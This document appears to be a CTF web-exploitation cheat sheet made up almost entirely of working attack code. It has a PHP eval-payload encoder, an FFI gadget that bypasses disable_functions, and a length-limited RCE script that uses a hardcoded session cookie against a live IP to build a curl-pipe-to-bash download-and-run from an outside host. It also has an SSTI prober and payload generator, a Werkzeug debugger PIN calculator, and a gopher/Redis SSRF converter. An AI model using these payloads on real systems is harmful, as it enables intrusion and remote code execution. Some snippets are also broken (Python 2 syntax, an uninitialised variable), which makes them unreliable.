// eval()-like sink; the only robust fix is not to evaluate user input.
for($aa = 0;$aa < strlen($payload);$aa++){
    if(ord($payload[$aa])>=ord('a') && ord($payload[$aa])<=ord('z')){
        if($flag === True){
            $flag = False;
            $result .= "(";
        }
        // ${$payload[$aa]} is a variable-variable: $s for the byte 's', etc.
        $result .= "((${$payload[$aa]})).";
    }
    elseif($payload[$aa] === "(" or $payload[$aa] === ")"){
        if($flag === False){
            // Close the open letter group, replacing its trailing '.'.
            $result = substr($result, 0, strlen($result)-1) . ")";
            $flag = True;
        }
        // Parentheses are copied through literally (dropping a dangling '.').
        if($result[strlen($result)-1] === "."){
            $result = substr($result, 0, strlen($result)-1) . $payload[$aa];
        }
        else{
            $result .= $payload[$aa];
        }
    }
    else{
        if($flag === False){
            $result = substr($result, 0, strlen($result)-1) . ")";
            $flag = True;
        }
        // Any other byte is looked up as $_XX, XX being its hex code.
        $tmp = "_".strval(dechex(ord($payload[$aa])));
        $result .= "((${$tmp})).";
    }
}
// Drop the '.' left behind by the last emitted expression, if any.
if ($result[strlen($result)-1] !== ")"){
    $result = substr($result, 0, strlen($result)-1);
}
$result .= ";";
echo urlencode($result);
?>
bypass disable_functions
php 7.4 FFI bypass
<?php
/**
 * Serializable gadget: unserialize() restores $data and immediately calls
 * run(), which invokes $data['func']($data['arg']) - here FFI::cdef() with a
 * C declaration of system(), making that function callable on the returned
 * FFI object even where disable_functions blocks the PHP-level system().
 *
 * Defensive notes: this needs the FFI extension loaded and ffi.enable set so
 * that ordinary scripts may call it (the default only allows preloaded code;
 * confirm for the target build). Serializable itself is deprecated since
 * PHP 8.1 in favour of __serialize()/__unserialize().
 */
final class A implements Serializable
{
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(const char *command);'
    ];

    // Calls the callable named in 'func' with 'arg' and stores the result in 'ret'.
    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    // Runs automatically while unserializing an A; $payload is the serialized $data array.
    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }
}
// Serialize a fresh A; unserializing this string where class A is loaded triggers unserialize() -> run().
$payload = serialize(new A);
echo $payload;
bypass length limited RCE
4 Str limited RCE
from time import sleep
from urllib.parse import quote # 负责URL编码
import base64
import requests
# Shell fragments of at most four characters (enforced by the assert below),
# sent one per request in order; each builds up a file on the target through
# output redirection, and the final two lines execute what was built.
payload = [
    '>dir',
    '>sl',
    '>g\>',
    '>ht-',
    '*>v',
    '>rev',
    '*v>x',
    '>\;\\',
    '>sh\\',
    '>ba\\',
    '>\|\\',
    '>x\\',
    '>x\\',
    '>x.\\',
    '>x\\',
    '>x.\\',
    '>x\\',
    '>x.\\',
    '>11\\',
    '>\ \\',
    '>rl\\',
    '>cu\\',
    # 1xxxx.x.x.x
    'sh x',
    'sh g',
]
r = requests.get('http://121.36.222.22:88/core/clear.php')
cookiess = { # send admin's cookie with the request
    "PHPSESSID": "08e44553061c5dc2d0f47bece853784c"
}
for i in payload:
    assert len(i) <= 4
    data = {
        # use compress.zlib://data: to get past the host check applied to data://
        # Defensive note: allow-list the expected schemes (e.g. http/https) rather
        # than denying specific wrappers; prefix checks miss wrapper nesting.
        "url": 'compress.zlib://data:@127.0.0.1/baidu.com?,' + quote(i)
    }
    r = requests.post('http://121.36.222.22:88/core/index.php', data=data, cookies=cookiess)
    print(r.text)
    sleep(0.1)
SSTI
find index
import requests
import re
import html
import time
# Probe subclass indices one by one until the rendered page mentions
# subprocess.Popen. Detection hint: '__class__'/'__subclasses__' in a URL is
# a strong SSTI indicator; mitigation: never render user input as template
# source, and use a sandboxed environment.
for i in range(1, 1000):
    url = "http://101.201.126.95:7050/{{[].__class__.__base__.__subclasses__()[" + str(i) + "]}}"
    print(url)
    r = requests.get(url)
    # res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
    # time.sleep(0.1)
    # print(res)
    # print(r.text)
    # res = html.unescape(res[0])
    # print(str(i) + " | " + res)
    #print(r.content)
    if "subprocess.Popen" in r.text:
        print()
        break
find system or file functions
from flask import Flask
from jinja2 import Template
# Some of special names
# Local enumeration: for every subclass of object in THIS interpreter, find
# dunder attributes that are plain functions whose __globals__ expose one of
# the builtins in neededFunction. Results depend on the local Python version
# and loaded modules, so they may not match the target - confirm against the
# target's version.
searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']
neededFunction = ['eval', 'open', 'exec']
pay = int(input("Payload?[1|0]"))
for index, i in enumerate({}.__class__.__base__.__subclasses__()):
    for attr in searchList:
        if hasattr(i, attr):
            # eval() on a locally built string; checks repr(i.<attr>) starts with 'function'
            if eval('str(i.'+attr+')[1:9]') == 'function':
                for goal in neededFunction:
                    # assumes __builtins__ is a dict here (it can be a module in some contexts) - TODO confirm
                    if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):
                        if pay != 1:
                            print(i.__name__,":", attr, goal)
                        else:
                            print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")
Flask debug mode find pin
import hashlib
from itertools import chain
# Recompute the Werkzeug debugger PIN from the same inputs the debugger uses
# (see the comment next to each value). The hashing steps mirror
# werkzeug.debug.get_pin_and_cookie_name; this md5 variant matches older
# Werkzeug releases - newer ones changed the hash, confirm the target version.
# Defensive note: every input here is readable from the filesystem, so a
# file-read bug on a host running the debugger becomes code execution; never
# enable the debugger outside local development.
probably_public_bits = [
    'flaskweb', # username
    'flask.app', # modname
    'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
    '2485410451622', # str(uuid.getnode()), /sys/class/net/eth0/address
    '1408f836b0ca514d796cbf8960e45fa1' # get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# Cookie name is derived before the pin salt is mixed in.
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
    # Group the 9 digits as 3x3 (first group size that divides evenly); for/else keeps the raw digits otherwise.
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)
Other Scripts
md5 Captcha
import hashlib
# Brute-force the integer whose md5 hex digest starts with the given six characters.
# NOTE(review): hashlib.md5(str(i)) is Python 2 behaviour; Python 3 requires bytes.
for i in range(1, 10000001):
    s = hashlib.md5(str(i)).hexdigest()[0:6]
    #s = hashlib.sha1(str(i)).hexdigest()[:6]
    if s == "6d0bc1":
        print(i)
        break
SSRF
Gopher + Redis
转换payload格式。
#coding: utf-8
import sys
# Python 2 script (print statement): converts a captured protocol dump into a
# single percent-encoded line. Lines starting with '>', '<' or '+' are skipped;
# a literal "\r" before the newline becomes %0d%0a, a bare newline %0a.
exp = ''
with open(sys.argv[1]) as f:
    for line in f.readlines():
        if line[0] in '><+':
            continue
        elif line[-3:-1] == r'\r':
            if len(line) == 3:
                # line is exactly "\r" + newline
                exp = exp + '%0a%0d%0a'
            else:
                line = line.replace(r'\r', '%0d%0a')
                line = line.replace('\n', '')
                exp = exp + line
        elif line == '\x0a':
            exp = exp + '%0a'
        else:
            line = line.replace('\n', '')
            exp = exp + line
print exp
MD5 验证码
php 版本:
<?php
// Brute-force an integer whose md5 hex digest ends in the given six characters.
// NOTE(review): $a is never initialised before the loop (it is null on the first iteration).
for($a; $a<100000000; $a++){
    if(substr(md5($a),-6,6) == 'a5ea8a'){
        echo $a;
        exit();
    }
}
?>